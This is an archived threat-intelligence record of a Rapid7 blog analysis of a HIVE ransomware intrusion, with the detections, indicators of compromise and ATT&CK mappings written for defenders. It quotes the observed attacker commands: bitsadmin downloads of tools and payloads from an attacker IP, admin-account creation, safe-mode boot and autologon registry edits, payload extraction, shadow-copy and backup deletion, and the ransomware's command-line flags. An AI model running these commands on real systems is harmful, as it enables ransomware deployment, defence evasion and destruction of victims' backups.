{
	"id": "8988a20e-97f0-468a-98a9-d49dd4277bfc",
	"created_at": "2026-04-06T00:09:19.935392Z",
	"updated_at": "2026-04-10T13:12:43.448296Z",
	"deleted_at": null,
	"sha1_hash": "54af8be5ea55fbd4a6315af19bcf612522377164",
	"title": "HIVE Ransomware Attack Research \u0026 Analysis | Rapid7 Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 101830,
	"plain_text": "HIVE Ransomware Attack Research \u0026 Analysis | Rapid7 Blog\r\nBy Rapid7\r\nPublished: 2023-01-11 · Archived: 2026-04-05 18:21:04 UTC\r\nHow malicious actors evade detection and disable defenses for more destructive HIVE\r\nRansomware attacks.\r\nRapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious\r\nactivity. One objective of this research is to discover new techniques being used in the wild, so we can develop\r\nnew detection and response capabilities.\r\nRecently, Rapid7 observed a malicious actor performing several known techniques for distributing ransomware\r\nacross many systems within a victim’s environment. In addition to those techniques, the actor employed a number\r\nof previously unseen techniques designed to to drop the defenses of the victim, inhibit monitoring, disable\r\nnetworking and allow time for the ransomware to finish encrypting files. These extra steps would make it\r\nextremely difficult, if not impossible, for a victim to effectively use their security tools to defend endpoints after a\r\ncertain point in the attack.\r\nRapid7 has updated existing and added new detections to InsightIDR to defend against these techniques. In this\r\narticle, we’ll explore the techniques employed by the threat actor, why they’re so effective, and how we’ve\r\nupdated InsightIDR to protect against them.\r\nWhat approach did the malicious actor take to prepare the victim's environment?\r\nInitially using Cobalt Strike, the malicious actor retrieved system administration tools and malicious payloads by\r\nusing the Background Intelligent Transfer Service (BITSAdmin).\r\n\"C:\\Windows\\system32\\bitsadmin.exe\" /transfer debjob /download /priority normal http://79.137.206.47/PsExec.exe\r\nbitsadmin /transfer debjob /download /priority normal http://79.137.206.47/int.exe C:\\Windows\\int.exe\r\nThe malicious actor then began using the remote process execution tool PSExec to execute batch files (rdp.bat)\r\nthat would cause registry changes to enable Remote Desktop sessions (RDP) using reg.exe. This enabled the\r\nmalicious actor to laterally move throughout the victim’s environment using the graphical user interface.\r\nPSEXESVC.exe: C:\\Windows\\PSEXESVC.exe└──cmd.exe: C:\\Windows\\system32\\cmd.exe /c \"\"rdp.bat\" \"└── reg.exe:\r\nRapid7 observed the malicious actor add/change policies for the Active Directory domain to perform the\r\nfollowing:\r\n1. Copy down batch scripts\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 1 of 10\n\n2. Execute batch scripts (file1.bat), which:\r\n3. Creates administrator account on the local system\r\n4. Reconfigures boot configuration data (bcdedit.exe) so that the host will not load any additional drivers or\r\nservices (ie: network drivers or endpoint protection)\r\n5. Sets various registry values to ensure the created local administrator user will automatically logon by\r\ndefault\r\n6. Changes the Windows Shell from Explorer to their malicious script (file2.bat)\r\n7. Reboots the system with the shutdown command\r\n8. On reboot, the system logs in and executes the shell (file2.bat), which:\r\n9. Extracts HIVE ransomware payload(s) from an encrypted archive (int.7z) using 7-Zip's console executable\r\n(7zr.exe)\r\n10. Executes the ransomware payload (int.exe or int64.exe)\r\nBelow are some commands observed executed by the malicious actor (with necessary redactions):\r\nxcopy.exe /C/Q/H/Y/Z\r\n\"\\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\Policies {\u003cREDACTED\u003e}\\Machine\\Scripts\\Startup\\file1.bat\" \"C:\\windows\"\r\nxcopy.exe /C/Q/H/Y/Z\r\n\"\\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\Policies\\{\u003cREDACTED\u003e}\\Machine\\Scripts\\Startup\\file2.bat\" \"C:\\windows\"\r\nxcopy.exe /C/Q/H/Y/Z\r\n\"\\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\Policies\\{\u003cREDACTED\u003e}\\Machine\\Scripts\\Startup\\7zr.exe\" \"C:\\windows\"\r\nxcopy.exe /C/Q/H/Y/Z\r\n\"\\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\Policies\\{\u003cREDACTED\u003e}\\Machine\\Scripts\\Startup\\int.7z\" \"C:\\windows\\\"\r\nC:\\WINDOWS\\SYSTEM32\\cmd.exe /c \"C:\\windows\\file1.bat\"\r\nnet user \u003cREDACTED\u003e \u003cREDACTED\u003e /add\r\nC:\\WINDOWS\\system32\\net1 user \u003cREDACTED\u003e \u003cREDACTED\u003e /add\r\nnet user \u003cREDACTED\u003e /active:yes\r\nC:\\WINDOWS\\system32\\net1 user \u003cREDACTED\u003e /active:yes\r\nnet localgroup Administrators \u003cREDACTED\u003e /add\r\nC:\\WINDOWS\\system32\\net1 localgroup Administrators \u003cREDACTED\u003e /add\r\nbcdedit /set {default} safeboot minimal\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v LegalNoticeText /t REG_SZ /d \"\" /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v LegalNoticeCaption /t REG_SZ /d \"\" /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LegalNoticeText /t REG_SZ /d \"\" /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LegalNoticeCaption /t REG_SZ /d \"\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultUserName /t REG_SZ /d \u003cREDACTED\u003e\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultPassword /t REG_SZ /d \u003cREDACTED\u003e\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoLogonCount /t REG_DWORD /d 1 /f\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Shell /t REG_SZ /d \"C:\\windows\\file2.ba\r\nshutdown -r -f -t 10 -c \"Computer Will Now Restart In SAFE MODE...\"\r\nRapid7 also observed the malicious actor extracting HIVE ransomware payload using 7zip's console application\r\n(7zr.exe) from encrypted 7zip archive (int.7z) with a simple password (123):\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 2 of 10\n\n\"C:\\windows\\7zr.exe\" x c:\\windows\\int.7z -p123 -oc:\\windows\r\nThe malicious actor then manually executed the ransomware (int.exe) once with only the required\r\nusername:password combination passed to the -u flag. This presumably encrypted the local drive and also all\r\nnetwork shares the user had access to:\r\n\"C:\\Windows\\int.exe\" -u \u003cREDACTED\u003e:\u003cREDACTED\u003e\"\r\nThe malicious actor also manually executed the 64 bit version of the ransomware (int64.exe) once on a different\r\nhost with the -no-discovery flag. This is likely intended to override the default behavior and not discover network\r\nshares to encrypt their files. The -u flag was also passed and the same values for the username:password were\r\nprovided as seen on the other host.\r\nC:\\Windows\\int64.exe  -u \u003cREDACTED\u003e:\u003cREDACTED\u003e -no-discovery\r\nWhy is the HIVE Ransomware approach so effective?\r\nDeployment of ransomware using Active Directory group policies allows the malicious actor to hit all systems in\r\nthe environment for as long as that group policy is active in the victim’s environment. In this case, any system that\r\nwas booting and connected to the environment would receive the configuration changes, encrypted archive\r\ncontaining the ransomware, a decompression utility to extract the ransomware, configuration changes and the\r\norder to reboot and execute. This can be especially effective if timed with deployments of patches that require a\r\nreboot, done at the beginning of the day or even remotely using Powershell's Stop-Computer cmdlet.\r\nStoring the ransomware within a 7zip encrypted archive  (int.7z) with a password even as simple as (123) makes\r\nthe task of identifying the ransomware on disk or transmitted across the network nearly impossible. This makes\r\nretrieval and staging of the malicious actors payload very difficult to spot by security software or devices\r\n(Antivirus, Web Filtering, IDS/IPS and more). In this case, the malicious actor has taken care to only put the\r\nencrypted copy on the disk of a victim’s system and not execute it until they have fully dropped the defenses on\r\nthe endpoint.\r\nReconfiguring the default boot behavior to safeboot minimal and then executing a reboot unloads all but the bare\r\nminimum for the Windows operating system. With no additional services, software or drivers loaded the system is\r\nat its most vulnerable. With no active defenses (Antivirus or Endpoint Protection) the system comes up and tries to\r\nstart its defined shell which has been swapped to a batch script (file2.bat) by the malicious actor.\r\nIt should be noted that in this state, there is no method of remotely interacting with the system as no network\r\ndrivers are loaded. In order to respond and halt the ransomware, each host must be physically visited for\r\nshutdown. Manually priming the host in this way is more effective than the existing capabilities of the HIVE\r\nransomware which stops specific defensive services (Windows Defender, etc) and kills specific processes prior to\r\nencrypting the contents of the drive.\r\nAll systems in this state are left automatically logged in as an administrator, which gives anyone who has physical\r\naccess complete control. Lastly, the system will continue to boot into safeboot minimal mode by default (again, no\r\nnetworking) until each system is set back to its original state with a command such as below. Bringing the host\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 3 of 10\n\nback online in this state will still continue to execute the malware when logged into, which will also enable the\r\ndefault network spreading behavior.\r\nbcdedit /deletevalue {default} safeboot\r\nLastly, the malicious actor also manually executed the payload a few times on systems that had not been put into\r\nsafeboot minimal and rebooted. Systems they executed with only the -u flag actively searched out network shares\r\nthey had access to and encrypted their contents. This ensures that only the intended hosts do network share\r\nencryption and all those that were rebooted into safeboot minimal do not flood the network simultaneously\r\nencrypting all files. It also means that the contents of network file shares that are not Windows based (various\r\nNAS devices, Linux hosts using Samba) will be encrypted even if the payload is not actually deployed on that\r\nspecific host. This approach would be extremely destructive to both corporate environments and home users with\r\nnetwork attached storage systems for backups. Rapid7 notes that ThreatLocker have reported on similar activity in\r\ntheir knowledge base article entitled Preventing BCDEdit From Being Weaponized.\r\nMalware analysis of HIVE sample\r\nRapid7 observed that the HIVE payload would not execute unless a flag of -u was passed. During analysis it was\r\ndiscovered that passing -u asdf:asdf would result in the Login and Password (colon-delimited) provided to the\r\nvictim to authenticate to the site behind the onion link on the TOR network:\r\nThis, and other behaviors were previously reported on by Microsoft's article Hive Ransomware Gets Upgrades in\r\nRust and also by Sophos in their Github Repository of IoC's mentioned in their article Lockbit, Hive, and\r\nBlackCat attack automotive supplier in triple ransomware attack. There have been some flags that are noted to\r\nexist, but their features are not documented. Rapid7 has analyzed the behaviors of these flags, documented them in\r\naddition to discovering two new flags (-timer, -low-key) in the HIVE ransomware samples.\r\nThe new flags -t, -timer, --timer effectively cause the malware to wait the specified number of seconds before\r\ngoing on to perform its actions. The other new flags -low-key, --low-key will cause the ransomware to focus on\r\nonly its encryption of data and not perform pre-encryption tasks, including deleting shadow copies (malicious use\r\nof vssadmin.exe, wmic.exe), deleting backup catalogs (malicious use of wbadmin.exe), and disabling Windows\r\nRecovery Mode (malicious use of bcdedit.exe). These features give the malicious actor more control over\r\nhow/when the payload is executed and skirt common methods of command line and parent/child process related\r\ndetection for most ransomware families.\r\nFundamentally, the sample’s respective flags distill down into encryption operations of local, mount and\r\ndiscovery.  The local module utilizes the LookupPrivilegeValueW and AdjustTokenPrivileges that Windows API\r\ncalls on its own process via GetCurrentProcess and OpenProcessToken to obtain SeDebugPrivilege privileges.\r\n This is presumably crucial for OpenProcess -\u003e OpenProcessToken -\u003e ImpersonateLoggedOnUser API call\r\nattempts to processes: winlogon.exe and trustedinstaller.exe to subsequently stop security services and essential\r\nprocesses, if the --low-key is not passed during execution.  ShellExecuteA is also used to launch various Windows\r\nbinaries (bcdedit.exe, notepad.exe, vssadmin.exe, wbadmin.exe, wmic.exe) for destruction of backups and ransom\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 4 of 10\n\nnote display purposes. The mount module will use NetUseEnum to identify the current list of locally-mounted\r\nnetwork shares and add them to the list to be encrypted. Lastly, the discovery module will use NetServerEnum to\r\nidentify available Windows hosts within the domain/workgroup. This list is then used with NetShareEnum to\r\nidentify file shares on each remote host and add them to the list of locations to have their files encrypted.\r\nBy default, all three modes (local, mount and discovery)are enabled, so all local, mounted and shares able to be\r\nenumerated will have their contents encrypted. This effectively ransoms all systems in a victim’s environment\r\nwith a single execution of HIVE—when performed by a privileged user such as a Domain or Enterprise Admin\r\naccount. Command line flags may be used to change this behavior and invoke one or more of the modules. For\r\ninstance—local-only will use only the local module while—network-only will use the mount and discovery\r\nmodules.\r\nFlag Description\r\n-u \u003cusername\u003e:\u003cpassword\u003e for login for hivecust*.onion domain to identify victim\r\n-da\r\n\u003cdomainname\u003e\\\u003cusername\u003e:\u003cpassword\u003e use different credentials when doing network\r\nspreading. Likely shorthand for \"Domain Admin\". Calls LogonUserW triggering an 4624(S):\r\nType 3 Network Logon event. Will then call ImpersonateLoggedOnUser using the token in the\r\nresponse from LogonUserW.\r\n-low-key\r\n--low-key\r\nEncrypt files and open ransom note, if local filesystem is to be encrypted, but do not spawn\r\nother binaries (vssadmin.exe, WMIC.exe, wbadmin.exe, bcdedit.exe) to perform other\r\ndestructive actions for impact. Will also skip enumeration and stopping of antivirus software.\r\n-no-local\r\n--no-local\r\nDo not encrypt local files\r\n-no-mounted\r\n--no-mounted\r\nDo not encrypted mounted filesystems\r\n-no-discoveryDo not enumerate or encrypt file shares on the network\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 5 of 10\n\n--no-discovery\r\n-local-only\r\n--local-only\r\nOnly encrypt local file systems\r\n-network-only\r\n--network-only\r\nOnly encrypt file shares on the network.\r\n-explicit-only\r\n--explicit-only\r\nOnly encrypt files in this specific path specified\r\n-min-size\r\n--min-size\r\nOnly encrypt files greater than or equal to a specific number of bytes\r\n-t\r\n-timer\r\n--timer\r\nDo not encrypt files until after specified number of seconds\r\nBy default, the ransomware will execute the following child processes with the following arguments:\r\nUse of vssadmin.exe in order to delete shadow copies of files which deletes unencrypted backups of files they are\r\nattempting to ransom:\r\n\"C:\\Windows\\System32\\vssadmin.exe\" delete shadows /all /quiet\r\nUse of wmic.exe to create calls that also delete all shadow copies of files which deletes unencrypted backups of\r\nfiles they are attempting to ransom:\r\n\"C:\\Windows\\System32\\wbem\\WMIC.exe\" shadowcopy delete\r\nUse of wbadmin.exe to delete backup catalogs:\r\n\"C:\\Windows\\System32\\wbadmin.exe\" delete systemstatebackup\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 6 of 10\n\n\"C:\\Windows\\System32\\wbadmin.exe\" delete catalog-quiet\r\n\"C:\\Windows\\System32\\wbadmin.exe\" delete systemstatebackup -keepVersions:3\r\nUse of bcdedit.exe to disable automatic repair and ignore errors when booting:\r\n\"C:\\Windows\\System32\\bcdedit.exe\" /set {default} recoveryenabled No\r\n\"C:\\Windows\\System32\\bcdedit.exe\" /set {default} bootstatuspolicy ignoreallfailures\r\nLastly, also opening up notepad.exe to display the ransom note with instructions to the victim on how to pay:\r\n\"C:\\Windows\\System32\\notepad.exe\" C:\\HOW_TO_DECRYPT.txt\r\nRapid7 Protection\r\nRapid7's ransomware prevention solution, InsightIDR, has detections in place through Insight Agent to detect this\r\ntype of ransomware activity. However, since the malicious actor is rebooting into safemode minimal state,\r\nendpoint protection software and networking will not be running while the endpoint is executing ransomware.\r\nSo, identifying the actions of a malicious actor before ransomware is deployed is crucial to preventing the attack.\r\nIn other words, it is essential to identify malicious actors within the environment and eject them before the\r\nransomware payload is dropped.\r\nThe following detections are now available InsightIDR to identify this attacker behavior.\r\nAttacker Technique - Auto Logon Count Set Once\r\nAttacker Technique - Potential Process Hollowing To DLLHost\r\nAttacker Technique - Shutdown With Message Used By Malicious Actors\r\nAttacker Technique - URL Passed To BitsAdmin\r\nLateral Movement - Enable RDP via reg.exe\r\nSuspicious Process - BCDEdit Enabling Safeboot\r\nSuspicious Process - Boot Configuration Data Editor Activity\r\nSuspicious Process - DLLHost With No Arguments Spawns Process\r\nSuspicious Process - Rundll32.exe With No Arguments Spawns Process\r\nSuspicious Process - ShadowCopy Delete Passed To WMIC\r\nSuspicious Process - Volume Shadow Service Delete Shadow Copies\r\nIOC's\r\nType Value\r\nRegistry Key HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 7 of 10\n\nRegistry Value Type: DWORD Name: fDenyTSConnections Value: 0\r\nFilename rdp.bat\r\nFilename file1.bat\r\nFilename file2.bat\r\nFilename int.7z\r\nFilename int64.exe\r\nMD5 89ea20880a6aae021940a8166ff85ee8\r\nSHA1 4af769fb3109c754bc879201c61242217a674a2e\r\nSHA256 067af912ceddb1ea181490f2b3b5a323efcac61c82207833cda70c21c84460cb\r\nFilename int.exe\r\nMD5 8fba0d57696ccf672ddcea4ba4d0e885\r\nSHA1 31097a7f91d182755fc63ebf023bff54cda5ae9c\r\nSHA256 184a0f96cef09408b192767b405b0266403c9ec429945c1a78703f04f18c7416\r\nIP Address 79.137.206[.]47\r\nFQDN paloaltocloud[.]online\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 8 of 10\n\nFQDN maxkey[.]online\r\nFQDN keycloud[.]live\r\nFQDN microcloud[.]online\r\nFQDN microcloud[.]live\r\nIP Address 194.135.24[.]241\r\nIP Address 179.43.142[.]230\r\nIP Address 77.73.133[.]80\r\nIP Address 77.73.134[.]27\r\nIP Address 77.73.134[.]10\r\nT1021 - Remote Services\r\nT1021.001 - Remote Desktop Protocol\r\nT1021.002 - SMB/Windows Admin Shares\r\nT1027 - Obfuscated Files Or Information\r\nT1027.009 - Embedded Payloads\r\nT1037 - Boot Or Logon Initialization Scripts\r\nT1037.003 - Network Logon Script\r\nT1059 - Command And Scripting Interpreter\r\nT1059.001 - PowerShell\r\nT1059.003 - Windows Command Shell\r\nT1070 - Indicator Removal\r\nT1080 - Taint Shared Content\r\nT1105 - Ingress Tool Transfer\r\nT1112 - Modify Registry\r\nT1135 - Network Share Discovery\r\nT1136 - Create Account\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 9 of 10\n\nT1136.001 - Local Account\r\nT1140 - Deobfuscate/Decode Files Or Information\r\nT1197 - BITS Jobs\r\nT1480 - Execution Guardrails\r\nT1484 - Domain Policy Modification\r\nT1484.001 - Group Policy Modification\r\nT1485 - Data Destruction\r\nT1486 - Data Encrypted For Impact\r\nT1489 - Service Stop\r\nT1490 - Inhibit System Recovery\r\nT1529 - System Shutdown/Reboot\r\nT1547 - Boot Or Logon Autostart Execution\r\nT1560 - Archive Collected Data\r\nT1560.001 - Archive Via Utility\r\nT1562 - Impair Defenses\r\nT1562.001 - Disable Or Modify Tools\r\nT1562.009 - Safe Mode Boot\r\nT1570 - Lateral Tool Transfer\r\nSoftware\r\nS0029 - PSExec\r\nS0075 - Reg\r\nS0190 - BITSAdmin\r\nS0154 - Cobalt Strike\r\nJakob Denlinger conducted malware analysis for this report.\r\nSource: https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/"
	],
	"report_names": [
		"increasing-the-sting-of-hive-ransomware"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434159,
	"ts_updated_at": 1775826763,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/54af8be5ea55fbd4a6315af19bcf612522377164.pdf",
		"text": "https://archive.orkl.eu/54af8be5ea55fbd4a6315af19bcf612522377164.txt",
		"img": "https://archive.orkl.eu/54af8be5ea55fbd4a6315af19bcf612522377164.jpg"
	}
}